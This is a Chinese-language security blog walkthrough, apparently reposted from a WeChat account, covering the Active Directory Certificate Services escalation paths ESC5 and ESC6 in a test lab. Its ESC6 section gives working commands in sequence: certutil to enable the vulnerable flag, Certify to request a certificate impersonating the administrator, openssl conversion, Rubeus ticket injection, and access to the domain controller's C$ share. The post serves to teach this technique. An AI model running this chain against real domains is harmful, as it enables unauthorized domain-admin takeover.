ADCS-域提权-ESC5-ESC6

admin 2024年1月11日12:39:07评论26 views字数 1860阅读6分12秒阅读模式

交替的四季都在告诉你,要向前走。

The alternating seasons are all telling you to move forward.

ESC5

在《Certified Pre-Owned – Abusing Active Directory Certificate Services》中,描述ESC5影响范围比较广泛,不仅是证书模板和证书服务,其它对象也会对ADCS产生影响,例如:● CA 服务器的 AD 计算机对象(即通过 S4U2Self 或 S4U2Proxy 进行攻击) ● CA服务器的RPC/DCOM服务器 ● 容器中的任何子 AD 对象或容器 CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=例如, 证书模板容器、证书颁发机构容器、 NTAuthCertificates 对象、注册服务容器等)

ADCS-域提权-ESC5-ESC6

由于ESC5涉及的范围比较宽泛,后续有想法再仔细了解吧。

ESC6

在《Certified Pre-Owned – Abusing Active Directory Certificate Services》中,提到ESC6开启EDITF_ATTRIBUTESUBJECALTNAME2时,无论什么模版,都可以使用alternative name进行用户伪造。也就是说当EDITF_ATTRIBUTESUBJECALTNAME2启用时,任何有客户端认证的证书模版都可以使用ESC1进行利用。(首当其冲的就是默认带的User模版了)

在微软官方解释是这样的,当EDITF_ATTRIBUTESUBJECALTNAME2启用时,任何请求都可以定义任意值在alternative name中:

ADCS-域提权-ESC5-ESC6

EDITF_ATTRIBUTESUBJECALTNAME2开启与关闭

在CA服务器上查看是否启用了EDITF_ATTRIBUTESUBJECALTNAME2

certutil -getreg policyEditFlags
ADCS-域提权-ESC5-ESC6

启用EDITF_ATTRIBUTESUBJECALTNAME2

certutil –setreg policyEditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2

certutil -config "DC1.t0ngmystictestad.comt0ngmystictestad-DC1-CA" -setreg "policyEditFlags" +EDITF_ATTRIBUTESUBJECTALTNAME2
ADCS-域提权-ESC5-ESC6

禁用EDITF_ATTRIBUTESUBJECALTNAME2

certutil -setreg policyEditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2

certutil -config "DC1.t0ngmystictestad.comt0ngmystictestad-DC1-CA" -setreg "policyEditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2
ADCS-域提权-ESC5-ESC6

当启用或禁用时,需重启服务才能生效:

net stop certsvc && net start certsvc
ADCS-域提权-ESC5-ESC6

ESC6利用

探测是否开启EDITF_ATTRIBUTESUBJECALTNAME2

Certify.exe find /vulnerable
ADCS-域提权-ESC5-ESC6

给定alternative name为administrator,伪造administrator身份注册User证书:

Certify.exe request /ca:DC1.t0ngmystictestad.comt0ngmystictestad-DC1-CA /template:User /altname:administrator
ADCS-域提权-ESC5-ESC6

修改证书为pfx格式:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
ADCS-域提权-ESC5-ESC6

通过Rubeus请求tgt并注入内存:

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.111.11 /ptt
ADCS-域提权-ESC5-ESC6

成功以administrator域管身份访问域控:

dir \dc1.t0ngmystictestad.comc$
ADCS-域提权-ESC5-ESC6

原文始发于微信公众号(T0ngMystic工作站):ADCS-域提权-ESC5-ESC6

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月11日12:39:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ADCS-域提权-ESC5-ESC6http://cn-sec.com/archives/2214820.html

发表评论

匿名网友 填写信息